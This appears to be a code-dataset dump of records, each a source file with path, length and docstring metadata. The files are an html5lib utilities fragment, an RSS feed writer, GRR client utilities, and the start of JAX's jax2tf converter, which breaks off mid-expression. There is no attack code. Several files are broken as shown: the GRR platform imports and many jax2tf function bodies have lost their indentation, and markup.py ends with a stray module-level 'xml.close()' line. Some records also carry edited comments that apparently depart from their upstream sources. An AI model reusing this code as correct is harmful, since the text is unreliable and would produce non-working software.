    # the intended argument (as in upstream html5lib).
    if len(u"\U0010FFFF") == 2:
        return u"UCS2"
    else:
        return u"UCS4"
encodingType.func_annotations = {}
def isSurrogatePair(data):
    u"""Return True if ``data`` is exactly a UTF-16 surrogate pair:
    a high surrogate (U+D800..U+DBFF) followed by a low surrogate
    (U+DC00..U+DFFF)."""
    if len(data) != 2:
        return False
    high = ord(data[0])
    low = ord(data[1])
    return 0xD800 <= high <= 0xDBFF and 0xDC00 <= low <= 0xDFFF
isSurrogatePair.func_annotations = {}
def surrogatePairToCodepoint(data):
    u"""Return the code point encoded by the UTF-16 surrogate pair ``data``."""
    high_bits = ord(data[0]) - 0xD800
    low_bits = ord(data[1]) - 0xDC00
    return 0x10000 + high_bits * 0x400 + low_bits
surrogatePairToCodepoint.func_annotations = {}
# Module Factory Factory (no, this isn't Java, I know)
# Here to stop this being duplicated all over the place.
def moduleFactoryFactory(factory):
    u"""Wrap ``factory`` so that the module it builds for a given base
    module is created once and cached for later calls."""
    moduleCache = {}
    def moduleFactory(baseModule, *args, **kwargs):
        # Match the cache-key string type to the type of module names on
        # this interpreter build.
        if type(ModuleType.__name__) is unicode:
            name = u"_%s_factory" % baseModule.__name__
        else:
            name = "_%s_factory" % baseModule.__name__
        try:
            return moduleCache[name]
        except KeyError:
            mod = ModuleType(name)
            mod.__dict__.update(factory(baseModule, *args, **kwargs))
            moduleCache[name] = mod
            return mod
    moduleFactory.func_annotations = {}
    return moduleFactory
moduleFactoryFactory.func_annotations = {}
| python/html5lib/utils.py | 2,627 | Dict with 2 special properties:
On initiation, keys that are lists, sets or tuples are converted to
multiple keys so accessing any one of the items in the original
list-like object returns the matching value
md = MethodDispatcher({("foo", "bar"):"baz"})
md["foo"] == "baz"
A default value which can be set through the default attribute.
Using _dictEntries instead of directly assigning to self is about twice as fast. Please do careful performance testing before changing anything here.Some utility functions to dal with weirdness around UCS2 vs UCS4python builds Module Factory Factory (no, this isn't Java, I know) Here to stop this being duplicated all over the place. | 676 | en | 0.842082 |
import os
__author__ = "Aaron Koeppel"
__version__ = 1.0
def xmlMarkup(games, team_ab, team_name, team_record):
   '''Write an RSS 2.0 feed of the team's games to feeds/<team_ab>/<team_ab>_feed.xml.

   :param games: list of games that the team played this season
   :type games: list of GameData
   :param team_ab: the team's abbreviated name
   :type team_ab: string
   :param team_name: the team's name
   :type team_name: string
   :param team_record: the team's record, shown in the feed title
   :type team_record: string'''
   from xml.sax.saxutils import escape

   file_name = team_ab + "_feed.xml"
   # Used code from http://stackoverflow.com/questions/7935972/
   # writing-to-a-new-directory-in-python-without-changing-directory
   script_dir = os.path.dirname(os.path.abspath(__file__))
   dest_dir = os.path.join(script_dir, "feeds", team_ab)
   try:
      os.makedirs(dest_dir)
   except OSError:
      # directory already exists
      pass
   path = os.path.join(dest_dir, file_name)
   with open(path, 'w') as xml:
      xml.write('<?xml version="1.0" encoding="UTF-8" ?>\n')
      xml.write("<rss version='2.0'>\n")
      xml.write("<channel>\n")
      # Bug fix: escape dynamic text so characters such as '&' or '<'
      # cannot corrupt the generated XML.
      xml.write("<title>%s - %s</title>\n"
                % (escape(team_name), escape(team_record)))
      xml.write("<description>Latest %s scores</description>\n"
                % escape(team_name))
      xml.write("<link>http://espn.go.com/nhl/team/schedule/_/name/%s</link>\n"
                % escape(team_ab))
      for game in games:
         xml.write("<item>\n")
         xml.write("<title>%s</title>\n" % escape(game.headline))
         xml.write("<link>%s</link>\n" % escape(game.link))
         xml.write("</item>\n")
      xml.write("</channel>\n</rss>")
xml.close() | markup.py | 1,496 | Markup the RSS feed using the data obtained.
:param games: list of games that the team played this season
:type games: list of GameData
:param team_ab: the team's abbreviated name
:type team_ab: string
:param team_name: the team's name
:type team_name: string | 260 | en | 0.898845 |
#!/usr/bin/env python
"""Client utilities."""
import logging
import sys
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import client_fs as rdf_client_fs
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# pylint: disable=g-import-not-at-top
if sys.platform == "win32":
from grr_response_client import client_utils_windows as _client_utils
elif sys.platform == "darwin":
from grr_response_client import client_utils_osx as _client_utils
else:
from grr_response_client import client_utils_linux as _client_utils
# pylint: enable=g-import-not-at-top
# pylint: disable=g-bad-name
CanonicalPathToLocalPath = _client_utils.CanonicalPathToLocalPath
FindProxies = _client_utils.FindProxies
GetExtAttrs = _client_utils.GetExtAttrs
GetRawDevice = _client_utils.GetRawDevice
KeepAlive = _client_utils.KeepAlive
LocalPathToCanonicalPath = _client_utils.LocalPathToCanonicalPath
MemoryRegions = _client_utils.MemoryRegions
NannyController = _client_utils.NannyController
OpenProcessForMemoryAccess = _client_utils.OpenProcessForMemoryAccess
TransactionLog = _client_utils.TransactionLog
VerifyFileOwner = _client_utils.VerifyFileOwner
# pylint: enable=g-bad-name
def StatEntryFromPath(path, pathspec, ext_attrs=True):
  """Builds a stat entry object from a given path.

  Args:
    path: A path (string value) to stat.
    pathspec: A `PathSpec` corresponding to the `path`.
    ext_attrs: Whether to include extended file attributes in the result.

  Returns:
    `StatEntry` object.  If the path cannot be stat-ed, an entry
    containing only the pathspec is returned.
  """
  try:
    stat_obj = utils.Stat(path)
  except (IOError, OSError) as error:
    logging.error("Failed to obtain stat for '%s': %s", pathspec, error)
    # Fall back to a bare entry so callers still get the pathspec.
    return rdf_client_fs.StatEntry(pathspec=pathspec)

  return StatEntryFromStat(stat_obj, pathspec, ext_attrs=ext_attrs)
def StatEntryFromStat(stat, pathspec, ext_attrs=True):
  """Build a stat entry object from a given stat object.

  Args:
    stat: A `Stat` object.
    pathspec: A `PathSpec` from which `stat` was obtained.
    ext_attrs: Whether to include extended file attributes in the result.

  Returns:
    `StatEntry` object.
  """
  result = rdf_client_fs.StatEntry(pathspec=pathspec)

  # Copy over every raw stat field that is present; absent fields are
  # simply skipped.
  for attr in _STAT_ATTRS:
    raw_value = getattr(stat.GetRaw(), attr, None)
    if raw_value is None:
      continue

    # TODO(hanuszczak): Why are we doing this?
    int_value = int(raw_value)
    if int_value < 0:
      int_value &= 0xFFFFFFFF

    setattr(result, attr, int_value)

  result.st_flags_linux = stat.GetLinuxFlags()
  result.st_flags_osx = stat.GetOsxFlags()

  if ext_attrs:
    # TODO(hanuszczak): Can we somehow incorporate extended attribute getter to
    # the `Stat` class? That would make the code a lot prettier but would force
    # `utils` to depend on `xattrs`.
    result.ext_attrs = list(GetExtAttrs(stat.GetPath()))

  return result
def StatEntryFromStatPathSpec(stat, ext_attrs):
  """Build a `StatEntry` for a `Stat` result, deriving the pathspec from it."""
  pathspec = rdf_paths.PathSpec(
      path=LocalPathToCanonicalPath(stat.GetPath()),
      path_options=rdf_paths.PathSpec.Options.CASE_LITERAL,
      pathtype=rdf_paths.PathSpec.PathType.OS)

  return StatEntryFromStat(stat, pathspec, ext_attrs=ext_attrs)
# Names of the raw stat fields that `StatEntryFromStat` copies into a
# `StatEntry` (fields missing from the raw result are skipped).
_STAT_ATTRS = [
    "st_mode",
    "st_ino",
    "st_dev",
    "st_nlink",
    "st_uid",
    "st_gid",
    "st_size",
    "st_atime",
    "st_mtime",
    "st_ctime",
    "st_blocks",
    "st_blksize",
    "st_rdev",
]
| grr/client/grr_response_client/client_utils.py | 3,344 | Builds a stat entry object from a given path.
Args:
path: A path (string value) to stat.
pathspec: A `PathSpec` corresponding to the `path`.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
Build a stat entry object from a given stat object.
Args:
stat: A `Stat` object.
pathspec: A `PathSpec` from which `stat` was obtained.
ext_attrs: Whether to include extended file attributes in the result.
Returns:
`StatEntry` object.
Client utilities.
!/usr/bin/env python pylint: disable=g-import-not-at-top pylint: enable=g-import-not-at-top pylint: disable=g-bad-name pylint: enable=g-bad-name TODO(hanuszczak): Why are we doing this? TODO(hanuszczak): Can we somehow incorporate extended attribute getter to the `Stat` class? That would make the code a lot prettier but would force `utils` to depend on `xattrs`. | 878 | en | 0.772844 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental module transforms JAX functions to be executed by TensorFlow."""
import functools
import re
import string
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import jax
from jax import ad_util, api_util, config
from jax._src import api
from jax import core, custom_derivatives, dtypes
from jax import linear_util as lu
from jax import numpy as jnp
from jax import random, tree_util
from jax._src import util
from jax._src.lax import control_flow as lax_control_flow
from jax._src.lax import fft as lax_fft
from jax._src.lax import lax
from jax._src.lax import linalg as lax_linalg
import jax._src.random
from jax.api_util import flatten_fun
from jax.interpreters import ad
from jax.interpreters import pxla
from jax.interpreters import sharded_jit
from jax.interpreters import xla
from jax.lib import xla_client
from . import shape_poly
import numpy as np
import tensorflow as tf # type: ignore[import]
# These don't have public equivalents.
# pylint: disable=g-direct-tensorflow-import
from tensorflow.compiler.tf2xla.python import xla as tfxla # type: ignore[import]
from tensorflow.compiler.xla import xla_data_pb2 # type: ignore[import]
from tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding # type: ignore[import]
# pylint: enable=g-direct-tensorflow-import
PolyShape = shape_poly.PolyShape
# The scope name need to be a valid TensorFlow name. See
# https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.cc#L731
_VALID_SCOPE_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\/>-]*$")
_INVALID_SCOPE_CHAR = re.compile("[^A-Za-z0-9_.\\/>-]")
def _sanitize_scope_name(name):
scope_name = _INVALID_SCOPE_CHAR.sub("_", name)
if not _VALID_SCOPE_REGEX.match(scope_name):
scope_name = ".{}".format(scope_name)
return scope_name
# A value suitable in a TF tracing context: tf.Tensor, tf.Variable,
# or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.)
TfVal = Any
# Loose alias used in signatures for dtype-like values.
DType = Any
PrecisionType = int  # Enum xla_data.PrecisionConfig.Precision
def _is_tfval(v: TfVal) -> bool:
  """Check whether `v` is usable as a TF value: a tensor/variable, or
  something that can be converted to a tensor."""
  if isinstance(v, (tf.Tensor, tf.Variable)):
    return True
  try:
    # Note: this conversion is overkill and just intended as a type check; this
    # code is in principle only run if config.jax_enable_checks is True.
    # TODO: it is not true that this code is run only with jax_enable_checks.
    _safe_convert_to_tensor(v)
  except ValueError:
    return False
  return True
def _safe_convert_to_tensor(val, dtype=None) -> TfVal:
  """Convert `val` to a tf.Tensor, working around dtypes TF cannot handle."""
  if not dtype:
    dtype = val.dtype if hasattr(val, "dtype") else None
  conversion_type = to_tf_dtype(dtype) if dtype else None
  if dtype and dtype == dtypes.float0:
    # The float0 type is not known to TF; materialize zeros of the TF dtype.
    val = np.zeros(np.shape(val), conversion_type.as_numpy_dtype)
  return tf.convert_to_tensor(val, dtype=conversion_type)
# The implementation rules for primitives. The rule will be called with the
# arguments (TfVal) and must return TfVal (or a sequence thereof,
# if primitive.multiple_results). The vast majority of primitives do not need
# to worry about core.unit inputs or results. The exception are primarily the
# control-flow primitives.
tf_impl: Dict[core.Primitive, Callable[..., Any]] = {}
# Some primitive implementation rules need the abstract values of arguments
# and the results. This is the case for the primitives implemented using
# _convert_jax_impl and those that need to adjust the shape of the outputs
# due to missing TF shape inference rules for TFXLA ops. The rules for these
# primitives should be added to `tf_impl_with_avals`.
# The abstract value are passed to the implementation as two special kwargs
# `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a
# core.AbstractValue, or a tuple thereof when primitive.multiple_results).
tf_impl_with_avals: Dict[core.Primitive, Callable[..., Any]] = {}
# XLA is not linked in all environments; when converting a primitive, if this
# variable is disabled, we try harder to use only standard TF ops if they are
# applicable to the concrete use case; if the resulting conversion path ends up
# requiring a TFXLA operation, an exception is thrown instead.
_enable_xla = True
def _xla_disabled_error(primitive_name: str,
                        extra_msg: Optional[str] = None) -> Exception:
  """Build the error reported when a primitive requires XLA but the
  conversion was requested with enable_xla=False."""
  assert not _enable_xla
  message = f"Call to {primitive_name} cannot be converted with enable_xla=False."
  if extra_msg:
    message = f"{message} {extra_msg}"
  return NotImplementedError(message)
@functools.partial(api_util.api_hook, tag="jax2tf_convert")
def convert(fun: Callable,
*,
polymorphic_shapes: Optional[Sequence[Any]] = None,
with_gradient=True,
enable_xla=True) -> Callable:
"""Transforms `fun` to be executed by TensorFlow.
See
[README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or nested standard Python containers (tuple/list/dict) thereof
(pytrees).
polymorphic_shapes: Specifies input shapes to be treated polymorphically
during conversion.
.. warning:: The shape-polymorphic conversion is an experimental feature.
It is meant to be sound, but it is known to reject some JAX programs
that are shape polymorphic. The details of this feature can change. It
should be a Python object with the same pytree structure as, or a prefix
of, the tuple of arguments to the function, but with a shape
specification corresponding to each argument. The default value is
`None`, which is a shortcut for a tuple of `None` one for each argument,
denoting that all shapes are monomorphic.
See [how optional parameters are matched to
arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification for an array argument should be an object
`PolyShape(dim0, dim1, ..., dimn)`
where each `dim` is a dimension specification: a positive integer denoting
a monomorphic dimension of the given size, or a string denoting a
dimension variable assumed to range over non-zero dimension sizes, or
the special placeholder string "_" denoting a monomorphic dimension
whose size is given by the actual argument. As a shortcut, an Ellipsis
suffix in the list of dimension specifications stands for a list of "_"
placeholders. For convenience, a shape specification can also be given
as a string
representation, e.g.: "batch, ...", "batch, height, width, _", possibly
with surrounding parentheses: "(batch, ...)".
The conversion fails if it cannot ensure that the it would produce the same
sequence of TF ops for any non-zero values of the dimension variables.
polymorphic_shapes are only supported for positional arguments; shape
polymorphism is not supported for keyword arguments.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
in_shapes: DEPRECATED in favor of `polymorphic_shapes`.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is saved
in a SavedModel, the custom gradients are currently lost and an error will
be raised if a gradient computation is attempted. This is due to a current
bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
"""
api._check_callable(fun)
def converted_fun(*args: TfVal, **kwargs: TfVal) -> TfVal:
# TODO: is there a better way to check if we are inside a transformation?
if not core.trace_state_clean():
raise ValueError("convert must be used outside all JAX transformations." +
f"Trace state: {core.thread_local_state.trace_state}")
def check_arg(a):
if not _is_tfval(a):
msg = (f"Argument {a} of type {type(a)} of jax2tf.convert(f) should "
"be NumPy array, scalar, tf.Variable, or tf.Tensor")
raise TypeError(msg)
tree_util.tree_map(check_arg, args)
tree_util.tree_map(check_arg, list(kwargs.values()))
# Name input tensors
args = tuple(
tree_util.tree_map(lambda x, i=i: tf.identity(x, f"jax2tf_arg_{i}"),
a) # type: ignore
for i, a in enumerate(args))
kwargs = {k: tf.identity(v, f"jax2tf_arg_{k}") for k, v in kwargs.items()}
# This function may take pytrees of TfVals. We can only set
# tf.custom_gradient on functions that take a flat argument list.
args_flat, in_tree = tree_util.tree_flatten((args, kwargs))
if polymorphic_shapes is None:
polymorphic_shapes_ = (None,) * len(args)
else:
if not isinstance(polymorphic_shapes, Sequence) or len(args) != len(polymorphic_shapes):
msg = ("polymorphic_shapes must be a sequence with the same length as the positional argument list "
f"({len(args)}). Got polymorphic_shapes={polymorphic_shapes}.")
raise TypeError(msg)
polymorphic_shapes_ = tuple(polymorphic_shapes)
# Expand the polymorphic_shapes to match the argument pytree
polymorphic_shapes_flat = tuple(api_util.flatten_axes("jax2tf.convert polymorphic_shapes",
in_tree.children()[0],
polymorphic_shapes_))
# Add kwargs shapes.
polymorphic_shapes_flat = polymorphic_shapes_flat + tuple(
(None,) * (len(args_flat) - len(polymorphic_shapes_flat)))
# Construct the abstract values for the flat arguments, possibly based on
# the input shapes and the polymorphic_shapes if given. May create new shape
# variables.
args_avals_flat, shapeenv = _args_to_avals_and_env(args_flat,
polymorphic_shapes_flat)
f = lu.wrap_init(fun)
# out_tree_thunk() will be the output tree, after running _interpret_fun.
flat_fun, out_tree_thunk = flatten_fun(f, in_tree)
# Prepare the grad_fn for tf.custom_gradient.
def converted_grad_fn(*out_cts_flat: TfVal,
_out_cts_avals: Sequence[core.AbstractValue],
variables=None):
if variables:
raise ValueError(
"Unexpected variables used in forward pass. "
"This should not happen for first-order differentiation. "
f"variables={variables}")
def fun_vjp_jax(args_jax, out_cts_jax):
# One may think that we can get the pullback while we are converting
# the main function in the first place. That is problematic, because the
# pullback may contain captured tracers from the conversion of the
# main function. Those tracers will confuse the conversion of the
# pullback. So, we construct the vjp anew.
_, pullback_jax = jax.vjp(fun, *args_jax)
return pullback_jax(out_cts_jax)
if polymorphic_shapes is None:
vjp_polymorphic_shapes = None
else:
args_polymorphic_shapes = tree_util.tree_unflatten(
in_tree.children()[0], polymorphic_shapes_flat)
out_cts_polymorphic_shapes = tree_util.tree_unflatten(
out_tree_thunk(),
tuple(str(out_aval.shape)
for out_aval in _out_cts_avals)) # type: ignore
vjp_polymorphic_shapes = [
args_polymorphic_shapes, out_cts_polymorphic_shapes
]
out_cts = tree_util.tree_unflatten(out_tree_thunk(), out_cts_flat)
# TODO: enable higher-order gradients
with tf.name_scope("jax2tf_vjp"):
in_cts = convert(
fun_vjp_jax,
with_gradient=False,
polymorphic_shapes=vjp_polymorphic_shapes)(args, out_cts)
return in_cts
try:
global _shape_env
assert not _shape_env, f"Unexpected shape environment {_shape_env}"
global _enable_xla
prev_enable_xla = _enable_xla
_enable_xla = enable_xla
_shape_env = shapeenv
if with_gradient:
@tf.custom_gradient
def converted_fun_flat_with_custom_gradient(*args_flat: TfVal) -> TfVal:
out_with_avals = _interpret_fun(flat_fun, args_flat, args_avals_flat)
outs, out_avals = util.unzip2(out_with_avals)
return (tuple(outs),
functools.partial(
converted_grad_fn, _out_cts_avals=tuple(out_avals)))
out_flat = converted_fun_flat_with_custom_gradient(*args_flat)
else:
out_flat_raw = _interpret_fun(flat_fun, args_flat, args_avals_flat)
message = ("The jax2tf-converted function does not support gradients. "
"Use `with_gradient` parameter to enable gradients")
# We use PreventGradient, which is propagated through a SavedModel.
out_flat = [
tf.raw_ops.PreventGradient(input=o, message=message)
for o, _ in out_flat_raw
]
finally:
_shape_env = {}
_enable_xla = prev_enable_xla
out_flat = [tf.identity(x, "jax2tf_out") for x in out_flat]
out = tree_util.tree_unflatten(out_tree_thunk(), out_flat)
return out
return converted_fun
# Internals
def _interpret_fun(
    fun: lu.WrappedFun, in_vals: Sequence[TfVal],
    in_avals: Sequence[core.AbstractValue]
) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
  """Runs `fun` on TF values under a fresh TensorFlowTrace.

  Args:
    fun: the wrapped JAX function to interpret.
    in_vals: the TF values to use as inputs.
    in_avals: the JAX abstract values corresponding to `in_vals`.

  Returns:
    a tuple of (TF value, JAX abstract value) pairs, one per output of `fun`.
  """
  with core.new_base_main(TensorFlowTrace) as main:  # type: ignore
    fun = _interpret_subtrace(fun, main, in_avals)
    with core.new_sublevel():
      out_vals: Sequence[Tuple[TfVal, core.AbstractValue]] = \
        fun.call_wrapped(*in_vals)
    # Drop our reference to the MainTrace before leaving the context.
    del main
  return tuple(out_vals)
def _convert_jax_impl(jax_impl: Callable, *, multiple_results=True) -> Callable:
  """Wraps the JAX implementation of a primitive as a TF-callable function.

  Args:
    jax_impl: typically the impl-rule for a primitive, with signature
      `(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
      a primitive in terms of other primitives.
    multiple_results: whether `jax_impl` returns a sequence of results.

  Returns:
    a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs)
    -> Sequence[TfVal]`.
  """
  def wrapped(*tf_args: TfVal, _in_avals: Sequence[core.AbstractValue],
              _out_aval: core.AbstractValue, **kwargs) -> Sequence[TfVal]:
    # Present `jax_impl` as a function of JAX values only; _interpret_fun
    # abstracts the TF inputs into JAX tracers before invoking it.
    def as_jax_fun(*jax_args):
      results = jax_impl(*jax_args, **kwargs)
      if multiple_results:
        return results
      return [results]

    outs_with_avals = _interpret_fun(
        lu.wrap_init(as_jax_fun), tf_args, _in_avals)
    outs, _ = util.unzip2(outs_with_avals)
    if multiple_results:
      return outs
    return outs[0]

  return wrapped
@lu.transformation
def _interpret_subtrace(main: core.MainTrace,
                        in_avals: Sequence[core.AbstractValue],
                        *in_vals: TfVal):
  # A lu.transformation generator: boxes the TF inputs as TensorFlowTracers,
  # yields them to the wrapped function, then unboxes the results into
  # (TF value, abstract value) pairs.
  trace = TensorFlowTrace(main, core.cur_sublevel())
  in_tracers = tuple(
      TensorFlowTracer(trace, val, aval)
      for val, aval in util.safe_zip(in_vals, in_avals))
  # The outs may be core.unit, see comment in TensorFlowTrace.pure.
  outs = yield in_tracers, {}  # type: Sequence[Union[TfVal, core.Unit]]
  out_tracers: Iterable[TensorFlowTracer] = (
      map(trace.full_raise, outs))  # type: ignore
  out_vals_with_avals: Sequence[Tuple[TfVal, core.AbstractValue]] = (
      tuple((t.val, t.aval) for t in out_tracers))
  yield out_vals_with_avals
def _interpret_jaxpr(jaxpr: core.ClosedJaxpr, *args: TfVal) -> Sequence[TfVal]:
  """Evaluates a Jaxpr with tf.Tensor arguments.

  The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
  """
  wrapped_fun: lu.WrappedFun = lu.wrap_init(core.jaxpr_as_fun(jaxpr))
  outs_with_avals = _interpret_fun(wrapped_fun, args, jaxpr.in_avals)
  # Drop the abstract values; keep only the TF values.
  return tuple(out for out, _ in outs_with_avals)
### tracer
def _aval_to_tf_shape(aval: core.AbstractValue) -> Tuple[Optional[int], ...]:
  """Generate a TF shape, possibly containing None for polymorphic dimensions."""
  return tuple(None if isinstance(d, shape_poly.DimVar) else d
               for d in aval.shape)  # type: ignore[attr-defined]
def _tfval_shape_dtype(val: TfVal) -> Tuple[Sequence[Optional[int]], DType]:
  """Returns the shape and JAX dtype of a constant or converted-function input.

  The returned shape may have unknown components, but only when called for
  inputs.
  """
  if isinstance(val, (tf.Tensor, tf.Variable)):
    # A tf.Tensor/tf.Variable shape may be only partially known.
    return tuple(val.shape), to_jax_dtype(val.dtype)
  # Otherwise `val` must be a numeric value.
  assert not config.jax_enable_checks or _is_tfval(val), f"Non TfVal: {val}"
  raw_aval = xla.abstractify(val)
  return raw_aval.shape, raw_aval.dtype  # type: ignore[attr-defined]
# A dimension environment maps dimension variables to TF expressions that
# compute the value of the dimension. These expressions refer to the TF
# function arguments.
# (Populated per-argument by _args_to_avals_and_env below.)
_ShapeEnv = Dict[shape_poly.DimVar, TfVal]
def _args_to_avals_and_env(args: Sequence[TfVal],
                           polymorphic_shapes: Sequence[Optional[Union[str, PolyShape]]]) -> \
    Tuple[Sequence[core.AbstractValue], _ShapeEnv]:
  """Computes abstract values and a dimension environment for arguments.

  Args:
    args: the arguments, TF inputs.
    polymorphic_shapes: the polymorphic specifications for the arguments.

  Returns: a tuple of a sequence of abstract values corresponding to the
    arguments and a dimension environment.
  """
  shapeenv: _ShapeEnv = {}  # accumulated across all arguments, via closure

  def input_aval(arg: TfVal,
                 polymorphic_shape: Optional[str]) -> core.AbstractValue:
    """The abstract value for an input."""
    raw_shape, dtype = _tfval_shape_dtype(arg)
    aval_shape = shape_poly.parse_spec(polymorphic_shape, raw_shape)
    for i, d in enumerate(aval_shape):
      if type(d) is int:
        # Monomorphic dimension: must match the concrete argument shape.
        assert d == np.shape(arg)[i]
      elif type(d) is shape_poly.DimVar and d not in shapeenv:
        # Even if the shape of `arg` is known, we still use `tf.shape` for
        # safety, because the promise is that we will convert the function
        # to work for any value of the dimension.
        shapeenv[d] = tf.shape(arg)[i]  # type: ignore[index]
      else:
        # TODO: add an assertion tf.shape(arg)[i] == env[d]
        pass
    return core.ShapedArray(aval_shape, dtype)

  avals = tuple(map(input_aval, args, polymorphic_shapes))  # type: ignore
  return avals, shapeenv
# A shape environment maps shape variables to TfVal.
# NOTE: module-level mutable state; set and reset around each conversion by
# `converted_fun` (see the try/finally there).
_shape_env = {}  # type: _ShapeEnv
def _eval_shape(shape: Sequence[shape_poly.DimSize]) -> Sequence[TfVal]:
  """Evaluates a (possibly polymorphic) shape to concrete dimension values.

  Dimension variables are looked up in the current `_shape_env`; constant
  dimensions pass through unchanged.
  """
  assert all(d is not None for d in shape), (
      f"Argument shape should be a valid JAX shape but got {shape}")
  dims = []
  for d in shape:
    if type(d) is shape_poly.DimVar:
      dims.append(_shape_env[d])  # type: ignore[index]
    else:
      dims.append(d)
  return tuple(dims)
def shape_as_value(x):
  """Injects the shape of `x` as an array value.

  **Experimental: please give feedback, and expect changes!**

  This allows the use of a shape expression as array argument to JAX functions.
  A typical example is for implementing a mean operation:

      jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))

  Raises:
    NotImplementedError: always; this function is deprecated.
  """
  # return shape_as_value_p.bind(x)
  # BUG FIX: the exception must be raised, not returned; returning an
  # exception instance would silently flow into the caller's computation.
  raise NotImplementedError("shape_as_value is deprecated")
# # TODO: move this to masking or to some common library, if approved
# shape_as_value_p = core.Primitive("shape_as_value")
# shape_as_value_p.multiple_results = True
# def _shape_as_value_impl(x):
# x_shape = np.shape(x)
# def dim_to_int(dim: shape_poly.DimSize) -> int:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is None:
# msg = ("shape_as_value is not implemented for non-constant shapes "
# "except for masking and jax2tf. "
# f"Has shape: {x_shape}")
# raise TypeError(msg)
# else:
# return dim_int
# return tuple(map(dim_to_int, x_shape))
#
# shape_as_value_p.def_impl(_shape_as_value_impl)
#
# def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]:
# rank = len(x_aval.shape) # type: ignore[attr-defined]
# return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank
#
# shape_as_value_p.def_abstract_eval(_shape_as_value_abstract)
#
# def _shape_as_value_translation(comp, x):
# return xla_client._xla.ops.Tuple(comp,
# tuple(xb.constant(comp, d)
# for d in comp.GetShape(x).dimensions()))
#
# xla.translations[shape_as_value_p] = _shape_as_value_translation
#
# def _shape_as_value_jvp_rule(primals, tangents):
# # The shape does not depend on the contents of the input
# x, = primals
# zero = ad.Zero.from_value(0.)
# return shape_as_value(x), (zero,) * len(x.shape)
#
# ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule
#
# def _shape_as_value__batching_rule(batched_args, batch_dims):
# xv, = batched_args
# batch_dim, = batch_dims
# batch_size = xv.shape[batch_dim]
# batched_shape = shape_as_value(xv)
# one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:]
# res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape)
# return res, (0,) * len(one_shape)
#
# batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule
#
# def _shape_as_value_masking_rule(operands, operands_logical_shapes):
# x_logical_shape, = operands_logical_shapes
# return tuple(x_logical_shape)
#
# masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule
#
# def _shape_as_value_tf(x: TfVal,
# _in_avals: Sequence[core.AbstractValue],
# _out_aval: core.AbstractValue) -> TfVal:
# x_aval = _in_avals[0]
# def dim_to_tfval(dim: shape_poly.DimSize, dim_idx: int) -> TfVal:
# dim_int = _poly_dim_to_tf_dim(dim)
# if dim_int is not None:
# return tf.convert_to_tensor(dim_int)
# else:
# return tf.shape(x)[dim_idx]
# return tuple(dim_to_tfval(dim, dim_idx)
# for dim_idx, dim in enumerate(x_aval.shape)) # type: ignore[attr-defined]
#
# tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf
# TODO(b/26854495): pylint doesn't understand slots and inheritance.
# pylint: disable=assigning-non-slot
class TensorFlowTracer(core.Tracer):
  """Tracer class that boxes a TF value and a JAX abstract value.

  In addition to the TF value we carry the JAX abstract value because there are
  two cases when it cannot be recovered from the value: (a) when the abstract
  value is core.abstract_unit, in which case the value is tf.nan; (b) when we
  are converting with polymorphic shapes, in which case the shape of the value
  may have dimensions set to `None`, whereas the JAX abstract value may contain
  more precise information.

  When the value has a partially-known shape, the dimensions marked as `None`
  must correspond to non-constant dimensions in the abstract value.

  See README.md for details.
  """
  # val: TfVal          -- the boxed TF value
  # _aval: core.AbstractValue  -- the corresponding JAX abstract value
  __slots__ = ["val", "_aval"]

  def __init__(self, trace: "TensorFlowTrace", val: TfVal,
               aval: core.AbstractValue):
    self._trace = trace
    self._aval = aval
    if aval is core.abstract_unit:
      # Unit values pass through unchanged (represented as NaN; see
      # TensorFlowTrace.pure).
      self.val = val
    elif isinstance(val, (tf.Tensor, tf.Variable)):
      val_shape, val_dtype = _tfval_shape_dtype(val)
      aval_dtype = np.dtype(self._aval.dtype)  # type: ignore[attr-defined]
      if (val_dtype != aval_dtype and not config.x64_enabled and
          (val_dtype == tf.int32 and aval_dtype == jnp.int64 or
           val_dtype == tf.int64 and aval_dtype == jnp.int32 or
           val_dtype == tf.float32 and aval_dtype == jnp.float64 or
           val_dtype == tf.float64 and aval_dtype == jnp.float32 or
